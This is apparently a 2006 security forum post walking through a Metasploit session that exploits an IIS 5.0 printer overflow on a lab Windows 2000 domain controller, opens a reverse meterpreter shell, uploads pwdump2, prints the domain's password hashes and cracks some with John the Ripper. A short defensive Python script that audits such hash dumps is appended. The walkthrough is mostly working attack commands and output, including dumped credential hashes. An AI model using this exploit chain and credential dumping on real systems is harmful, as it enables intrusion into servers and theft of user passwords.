Post Sun Jul 30, 2006 10:06 pm

Using MSF meterpreter to upload and use pwdump2 on a win2k DC

Here you go, been fooling around with the Metasploit meterpreter and used it to exploit a host, upload pwdump2, execute the program successfully to dump the SAM hashes for the domain and then fire up john to crack the hashes. enjoy...

SegFault:~/framework-2.5 chrisgates$ ./msfconsole

__. .__. .__. __.
_____ _____/ |______ ____________ | | ____ |__|/ |_
/ \_/ __ \ __\__ \ / ___/\____ \| | / _ \| \ __\
| Y Y \ ___/| | / __ \_\___ \ | |_> > |_( <_> ) || |
|__|_| /\___ >__| (____ /____ >| __/|____/\____/|__||__|
\/ \/ \/ \/ |__|


+ -- --=[ msfconsole v2.5 [114 exploits - 74 payloads]

msf > use iis50_printer_overflow
msf iis50_printer_overflow > set PAYLOAD win32_reverse_meterpreter
PAYLOAD -> win32_reverse_meterpreter
msf iis50_printer_overflow(win32_reverse_meterpreter) > set RHOST 192.168.0.107
RHOST -> 192.168.0.107
msf iis50_printer_overflow(win32_reverse_meterpreter) > set LHOST 192.168.0.101
LHOST -> 192.168.0.101
msf iis50_printer_overflow(win32_reverse_meterpreter) > exploit
[*] Starting Reverse Handler.
[*] Trying Windows 2000 SP0/SP1 using return to esp at 0x732c45f3...
[*] Got connection from 192.168.0.101:4321 <-> 192.168.0.107:1631
[*] Sending Stage (2834 bytes)
[*] Sleeping before sending dll.
[*] Uploading dll to memory (69643), Please wait...
[*] Upload completed
meterpreter>
[ -= connected to =- ]
[ -= meterpreter server =- ]
[ -= v. 00000500 =- ]
meterpreter> help

Core Core feature set commands
------------ ----------------
read Reads from a communication channel
write Writes to a communication channel
close Closes a communication channel
interact Switch to interactive mode with a channel
help Displays the list of all register commands
exit Exits the client
initcrypt Initializes the cryptographic subsystem

Extensions Feature extension commands
------------ ----------------
loadlib Loads a library on the remote endpoint
use Uses a feature extension module
meterpreter> use
Usage: use -m module1,module2,module3 [ -p path ] [ -d ]

-m <mod> The names of one or more modules to load (e.g. 'net').
-p <path> The path to load the modules from locally.
-d Load the library from disk, do not upload it.
meterpreter> use -m Fs
loadlib: Loading library from 'ext680723.dll' on the remote machine.
meterpreter>
loadlib: success.
meterpreter> help

Core Core feature set commands
------------ ----------------
read Reads from a communication channel
write Writes to a communication channel
close Closes a communication channel
interact Switch to interactive mode with a channel
help Displays the list of all register commands
exit Exits the client
initcrypt Initializes the cryptographic subsystem

Extensions Feature extension commands
------------ ----------------
loadlib Loads a library on the remote endpoint
use Uses a feature extension module

File System File system interaction and manipulation commands
------------ ----------------
cd Change working directory.
getcwd Get the current working directory.
ls List the contents of a directory.
upload Upload one or more files to a remote directory.
download Download one or more files from a remote directory.

meterpreter> upload /Users/chrisgates/framework-2.5/evil/PWDUMP2.EXE C:\
upload: Starting upload of '/Users/chrisgates/framework-2.5/evil/PWDUMP2.EXE' to 'C:\\PWDUMP2.EXE'...
upload: 1 uploads started.
meterpreter>
upload: Upload from '/Users/chrisgates/framework-2.5/evil/PWDUMP2.EXE' succeeded.
meterpreter> upload /Users/chrisgates/framework-2.5/evil/SAMDUMP.DLL C:\
upload: Starting upload of '/Users/chrisgates/framework-2.5/evil/SAMDUMP.DLL' to 'C:\\SAMDUMP.DLL'...
upload: 1 uploads started.
meterpreter>
upload: Upload from '/Users/chrisgates/framework-2.5/evil/SAMDUMP.DLL' succeeded.
meterpreter> execute -f cmd -c
execute: Executing 'cmd'...
meterpreter>
execute: success, process id is 2116.
execute: allocated channel 4 for new process.
meterpreter> interact 4
interact: Switching to interactive console on 4...
meterpreter>
interact: Started interactive channel 4.

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.

C:\>PWDUMP2
PWDUMP2
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:f4d5c901afc6b10357012c647e1e3d7b:::
TsInternetUser:1000:747eb3a47d5c5997741c63e3b03d7af3:3600cc61d6a7732b46a82a8ba1ca98b2:::
NetShowServices:1001:00a1e1cd5cbee084f3e28a66a4b7c4b7:dc101f98eb6d8794771fcf7ce9906862:::
IUSR_LSO-HACKWINDOWS:1003:38925a13e93dfe7d3127babea64acab3:88c178bfaf976b026b3d36c01c11ca65:::
IWAM_LSO-HACKWINDOWS:1004:bed00505c344453b26d7329bcf953374:707983c77cff4606beb470e26122cf62:::
LSO:1111:743a025f7d3cfc4faad3b435b51404ee:bdf40214203c93099d9295c7d4595205:::
IME_USER:1112:4da9826b50892c5d00aa4eedb6ef32d3:b863209024a2f29f7f614cbb9ec4c8cd:::
IME_ADMIN:1113:4da9826b50892c5d00aa4eedb6ef32d3:b863209024a2f29f7f614cbb9ec4c8cd:::
testuser1:1115:0f20048efc645d0a179b4d5d6690bdf3:1120acb74670c7dd46f1d3f5038a5ce8:::
remote:1119:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
LSO-HACKWINDOWS$:1008:aad3b435b51404eeaad3b435b51404ee:872aa7a4b892bdb77dafec09c87fc7bb:::
TEST1$:1114:aad3b435b51404eeaad3b435b51404ee:aacd12d27c87cac8fc0b8538aed6f058:::

C:\>del PWDUMP2.EXE
del PWDUMP2.EXE
C:\PWDUMP2.EXE
Access is denied.

C:\>DEL SAMDUMP.DLL
DEL SAMDUMP.DLL

C:\>dir
dir
Volume in drive C has no label.
Volume Serial Number is A042-AC7F

Directory of C:\

12/22/2005 02:11p <DIR> ASFRoot
12/24/2005 08:07a 956 certreq.txt
12/22/2005 10:28p <DIR> Documents and Settings
12/22/2005 10:13p <DIR> Inetpub
01/02/2006 06:36a <DIR> Microsoft UAM Volume
01/02/2006 02:52a <DIR> Program Files
01/02/2006 12:45p 32,768 PWDUMP2.EXE
01/02/2006 07:11a <DIR> Share1
01/02/2006 07:11a <DIR> Share2
01/02/2006 05:09a <DIR> Share3
01/02/2006 02:50a <DIR> Snort
01/01/2006 05:30a <DIR> unzipped
01/01/2006 06:21a <DIR> WINNT
2 File(s) 33,724 bytes
11 Dir(s) 3,062,620,160 bytes free

C:\>exit
exit

interact: Ending interactive session.
meterpreter> getuid
meterpreter>
Username: IUSR_LSO-HACKWINDOWS
meterpreter> exit
exit
The meterpreter is shutting down...
[*] Meterpreter client finished.

[*] Exiting Reverse Handler.

SegFault:~ chrisgates$ cp /Users/chrisgates/framework-2.5/evil/LSO-DC-hash.rtf /Users/chrisgates/john-1.6.39/run/
SegFault:~ chrisgates$ cd john-1.6.39/run/
SegFault:~/john-1.6.39/run chrisgates$ john -i LSO-DC-hash.rtf
Loaded 17 passwords with no different salts (NT LM DES [24/32 4K])
TESTUSE (testuser1:1)
LSO (LSO:1)
R1 (testuser1:2)
PASSWOR (remote:1)
D (remote:2)

***I cut john off early, it wasn't a cracking exercise***
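As an added example (not part of the original post), a short Python audit of pwdump2-format output like the dump above: it parses the user:rid:lm:nt::: lines and flags what a defender would act on, namely blank passwords, LM hashes still being stored, passwords of seven characters or fewer (readable from an empty second LM half, which is why john only shows an LSO:1 half above), and accounts sharing a password. The sample lines are copied from the post; the function and constant names are my own.

```python
import re
from collections import defaultdict

# Well-known constants: the LM and NT hashes of an empty password.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_LM_HALF = EMPTY_LM[:16]   # LM hashes each 7-char half separately
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

PWDUMP_LINE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):::$")

def parse_pwdump(text):
    """Return one dict per well-formed pwdump line; other lines are skipped."""
    records = []
    for line in text.splitlines():
        m = PWDUMP_LINE.match(line.strip())
        if m:
            rec = m.groupdict()
            rec["lm"], rec["nt"] = rec["lm"].lower(), rec["nt"].lower()
            records.append(rec)
    return records

def audit(records):
    """Map each username with at least one finding to its sorted findings."""
    findings = defaultdict(list)
    by_nt = defaultdict(list)
    for r in records:
        u = r["user"]
        if r["nt"] == EMPTY_NT:
            findings[u].append("blank-password")
        if r["lm"] != EMPTY_LM:
            findings[u].append("lm-hash-stored")
            # An empty second half means the password is at most 7 chars long.
            if r["lm"][16:] == EMPTY_LM_HALF:
                findings[u].append("password-7-chars-or-fewer")
        if not u.endswith("$"):          # machine accounts ($) are not compared
            by_nt[r["nt"]].append(u)
    for users in by_nt.values():
        if len(users) > 1:
            for u in users:
                others = ",".join(sorted(set(users) - {u}))
                findings[u].append("shares-password-with:" + others)
    return {u: sorted(f) for u, f in findings.items()}

# Sample input: lines copied from the pwdump2 output in the post above.
SAMPLE = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:f4d5c901afc6b10357012c647e1e3d7b:::
LSO:1111:743a025f7d3cfc4faad3b435b51404ee:bdf40214203c93099d9295c7d4595205:::
IME_USER:1112:4da9826b50892c5d00aa4eedb6ef32d3:b863209024a2f29f7f614cbb9ec4c8cd:::
IME_ADMIN:1113:4da9826b50892c5d00aa4eedb6ef32d3:b863209024a2f29f7f614cbb9ec4c8cd:::
LSO-HACKWINDOWS$:1008:aad3b435b51404eeaad3b435b51404ee:872aa7a4b892bdb77dafec09c87fc7bb:::
"""

if __name__ == "__main__":
    for user, issues in audit(parse_pwdump(SAMPLE)).items():
        print(f"{user}: {', '.join(issues)}")
```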